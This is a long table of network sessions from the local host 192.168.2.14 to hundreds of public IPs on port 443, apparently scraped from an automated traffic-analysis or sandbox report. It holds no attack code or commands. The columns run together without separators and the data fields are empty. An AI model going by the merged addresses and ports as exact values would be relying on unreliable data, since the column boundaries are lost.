                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14754192.168.2.1452576124.31.40.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14755192.168.2.145540873.193.104.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14756192.168.2.144168484.4.33.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14757192.168.2.1435788179.94.252.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14758192.168.2.1435438202.167.114.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14759192.168.2.1450234119.30.60.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14760192.168.2.1449754193.24.160.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14761192.168.2.1443652193.244.171.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14762192.168.2.1444382217.20.55.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14763192.168.2.145643074.240.5.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14764192.168.2.1437532159.227.180.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14765192.168.2.1444386175.7.78.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14766192.168.2.145144420.68.100.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14767192.168.2.1438210136.174.68.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14768192.168.2.1439568185.177.101.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14769192.168.2.14529808.72.118.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14770192.168.2.1442260183.9.35.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14771192.168.2.144899853.108.231.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14772192.168.2.1454256106.91.214.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14773192.168.2.1433642106.158.96.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14774192.168.2.1456674173.57.225.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14775192.168.2.1460364146.255.108.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14776192.168.2.144781446.189.221.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14777192.168.2.143378852.3.105.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14778192.168.2.1439888163.222.60.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14779192.168.2.1448194146.14.136.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14780192.168.2.1459182212.117.101.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14781192.168.2.143367051.116.23.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14782192.168.2.1441048196.78.123.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14783192.168.2.1446064202.30.86.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14784192.168.2.1434622204.201.97.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14785192.168.2.1453872148.94.108.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14786192.168.2.1459098113.255.59.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14787192.168.2.1437502177.154.51.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14788192.168.2.143485648.147.73.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14789192.168.2.1436158171.47.200.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14790192.168.2.1439926101.23.57.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14791192.168.2.1438450170.8.21.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14792192.168.2.1449460192.121.230.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14793192.168.2.145311454.163.9.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14794192.168.2.145950438.178.101.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14795192.168.2.144177024.68.173.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14796192.168.2.1448416216.204.231.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14797192.168.2.1435608217.196.38.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14798192.168.2.145097641.23.111.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14799192.168.2.14599769.154.108.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14800192.168.2.14359108.224.62.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14801192.168.2.145184234.171.103.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14802192.168.2.1452270162.236.181.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14803192.168.2.143625840.108.219.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14804192.168.2.1444360140.213.205.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14805192.168.2.144857084.110.164.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14806192.168.2.144108650.238.84.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14807192.168.2.1450960164.35.125.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14808192.168.2.1451416179.105.207.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14809192.168.2.1449160200.218.252.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14810192.168.2.1458684114.37.52.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14811192.168.2.1452988115.175.19.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14812192.168.2.1448952220.236.126.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14813192.168.2.1452620195.33.47.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14814192.168.2.1440506150.219.73.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14815192.168.2.1443014194.35.114.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14816192.168.2.1441714193.210.217.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14817192.168.2.1459592135.208.7.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14818192.168.2.1436422194.255.194.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14819192.168.2.143400018.34.35.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14820192.168.2.145124812.201.231.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14821192.168.2.1447780148.169.16.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14822192.168.2.143385047.118.167.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14823192.168.2.144925247.116.94.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14824192.168.2.14484464.97.57.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14825192.168.2.144112298.115.186.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14826192.168.2.1453642210.126.107.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14827192.168.2.1433790114.51.11.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14828192.168.2.1434416156.164.9.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14829192.168.2.1449690124.27.142.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14830192.168.2.145297090.154.90.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14831192.168.2.144232232.104.99.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14832192.168.2.1457868209.243.3.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14833192.168.2.1444886212.154.249.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14834192.168.2.1435578195.71.60.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14835192.168.2.14530301.63.21.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14836192.168.2.1454960102.112.232.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14837192.168.2.1452538219.71.0.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14838192.168.2.1456556221.199.3.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14839192.168.2.145122661.161.73.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14840192.168.2.143898661.127.97.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14841192.168.2.143359224.159.32.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14842192.168.2.144746274.19.193.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14843192.168.2.145074425.155.255.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14844192.168.2.145787648.21.110.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14845192.168.2.145260882.220.117.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14846192.168.2.14398462.19.119.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14847192.168.2.1438084194.30.19.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14848192.168.2.1457176142.21.3.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14849192.168.2.143755241.95.255.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14850192.168.2.146033290.82.245.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14851192.168.2.144110478.10.121.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14852192.168.2.1443518100.192.6.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14853192.168.2.143356464.104.210.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14854192.168.2.144345864.54.116.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14855192.168.2.146081467.99.218.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14856192.168.2.1443014167.162.160.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14857192.168.2.1457818209.70.124.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14858192.168.2.1451032189.171.187.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14859192.168.2.1452198129.173.95.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14860192.168.2.144174866.212.33.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14861192.168.2.1439194129.186.159.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14862192.168.2.144165618.200.217.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14863192.168.2.1437002170.79.207.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14864192.168.2.1457136133.173.61.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14865192.168.2.1445136108.143.125.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14866192.168.2.143516288.36.183.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14867192.168.2.1439402135.128.245.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14868192.168.2.1452150212.200.239.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14869192.168.2.1439818144.43.94.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14870192.168.2.1444764223.123.143.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14871192.168.2.144772223.81.205.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14872192.168.2.1436462128.94.151.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14873192.168.2.1446482104.162.176.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14874192.168.2.1456332150.193.75.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14875192.168.2.143966414.136.40.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14876192.168.2.1440066183.181.33.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14877192.168.2.1433880156.177.27.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14878192.168.2.143825290.206.58.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14879192.168.2.1453308163.23.60.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14880192.168.2.1441314209.36.116.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14881192.168.2.1454886122.149.177.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14882192.168.2.1450260131.66.251.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14883192.168.2.1457824195.66.160.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14884192.168.2.1451782177.56.186.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14885192.168.2.1455944192.8.183.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14886192.168.2.1447232201.199.249.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14887192.168.2.1435766181.196.129.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14888192.168.2.145069869.217.7.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14889192.168.2.143649499.24.248.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14890192.168.2.143802278.178.70.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14891192.168.2.1443112203.149.97.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14892192.168.2.143869640.112.189.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14893192.168.2.145879651.44.129.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14894192.168.2.1452280113.138.90.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14895192.168.2.145016838.75.156.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14896192.168.2.1448260149.23.238.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14897192.168.2.1443354171.54.159.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14898192.168.2.143795238.178.250.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14899192.168.2.143947632.68.72.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14900192.168.2.1448078223.3.90.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14901192.168.2.145207434.175.159.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14902192.168.2.145989036.179.178.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14903192.168.2.145558654.87.33.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14904192.168.2.1454162198.77.221.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14905192.168.2.1456770143.204.60.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14906192.168.2.1442104143.198.31.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14907192.168.2.1438216177.134.158.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14908192.168.2.143702836.140.51.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14909192.168.2.1446054203.10.177.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14910192.168.2.145314669.76.232.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14911192.168.2.1451446163.216.160.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14912192.168.2.1445886203.154.57.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14913192.168.2.1432838124.187.216.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14914192.168.2.1440044151.63.162.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14915192.168.2.1437980209.12.184.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14916192.168.2.1448082179.198.244.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14917192.168.2.144812448.122.187.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14918192.168.2.1434930143.73.111.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14919192.168.2.1447404102.67.208.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14920192.168.2.1439288124.146.100.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14921192.168.2.1437662191.87.169.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14922192.168.2.1443962193.175.37.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14923192.168.2.1438656107.133.219.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14924192.168.2.1448482119.97.32.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14925192.168.2.143367463.209.251.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14926192.168.2.1454608120.41.138.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14927192.168.2.1451926104.153.249.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14928192.168.2.1441566133.216.43.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14929192.168.2.143723035.59.76.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14930192.168.2.145511675.32.151.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14931192.168.2.1450314212.53.211.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14932192.168.2.1450132155.104.211.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14933192.168.2.145222647.226.254.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14934192.168.2.1450882216.161.63.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14935192.168.2.1436846176.142.117.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14936192.168.2.1442874135.67.50.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14937192.168.2.1432796186.216.220.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14938192.168.2.1436644154.94.167.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14939192.168.2.145136466.216.247.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14940192.168.2.1456826179.150.44.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14941192.168.2.1438028158.143.248.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14942192.168.2.1437924202.38.152.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14943192.168.2.1458978132.250.97.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14944192.168.2.1459854182.165.42.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14945192.168.2.145248694.126.222.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14946192.168.2.145039642.114.245.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14947192.168.2.144242027.249.116.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14948192.168.2.1435740196.155.186.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14949192.168.2.144912445.84.229.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14950192.168.2.1458210136.174.76.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14951192.168.2.1434640145.118.183.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14952192.168.2.143582491.90.38.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14953192.168.2.1435764163.188.218.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14954192.168.2.1439464176.218.230.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14955192.168.2.1442696141.54.216.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14956192.168.2.1440370159.212.199.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14957192.168.2.1448622149.39.62.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14958192.168.2.143979240.254.53.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14959192.168.2.1449064147.113.203.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14960192.168.2.144079877.199.140.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14961192.168.2.143526434.171.104.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14962192.168.2.145030870.146.3.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14963192.168.2.143431699.100.127.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14964192.168.2.143973024.45.200.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14965192.168.2.145385688.247.122.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14966192.168.2.143750868.114.236.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14967192.168.2.1439744181.132.146.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14968192.168.2.144395241.48.40.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14969192.168.2.145362883.78.13.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14970192.168.2.1457894162.234.4.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14971192.168.2.1435676195.66.207.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14972192.168.2.145405236.241.245.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14973192.168.2.1458748144.17.128.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14974192.168.2.145186069.35.58.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
